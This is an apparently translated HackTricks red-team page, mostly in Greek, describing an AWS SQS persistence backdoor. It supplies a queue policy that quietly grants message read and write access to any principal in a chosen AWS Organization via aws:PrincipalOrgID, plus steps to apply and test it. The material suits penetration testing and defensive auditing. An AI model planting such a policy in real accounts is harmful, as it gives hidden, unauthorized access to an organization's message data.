AWS - SQS OrgID Policy Backdoor

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Καταχράσου την πολιτική πόρου ενός SQS queue για να παραχωρήσεις αθόρυβα τα Send, Receive και ChangeMessageVisibility σε οποιονδήποτε principal που ανήκει σε μια στοχευμένη AWS Organization χρησιμοποιώντας τη συνθήκη aws:PrincipalOrgID. Αυτό δημιουργεί ένα περιορισμένο στην οργάνωση (org-scoped) κρυφό μονοπάτι που συχνά παρακάμπτει ελέγχους που κοιτούν μόνο για ρητά account ή role ARNs ή star principals.

Backdoor policy (attach to the SQS queue policy)

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "OrgScopedBackdoor",
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:ReceiveMessage",
"sqs:SendMessage",
"sqs:ChangeMessageVisibility",
"sqs:GetQueueAttributes"
],
"Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
"Condition": {
"StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
}
}
]
}

Βήματα

  • Αποκτήστε το Organization ID με το AWS Organizations API.
  • Πάρτε το SQS queue ARN και ορίστε την πολιτική ουράς συμπεριλαμβάνοντας τη δήλωση παραπάνω.
  • Από οποιονδήποτε principal που ανήκει σε εκείνη την Organization, στείλτε και λάβετε ένα μήνυμα στην ουρά για να επικυρώσετε την πρόσβαση.

Επιπτώσεις

  • Κρυφή πρόσβαση σε επίπεδο Organization για ανάγνωση και εγγραφή SQS μηνυμάτων από οποιονδήποτε λογαριασμό στην καθορισμένη AWS Organization.

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks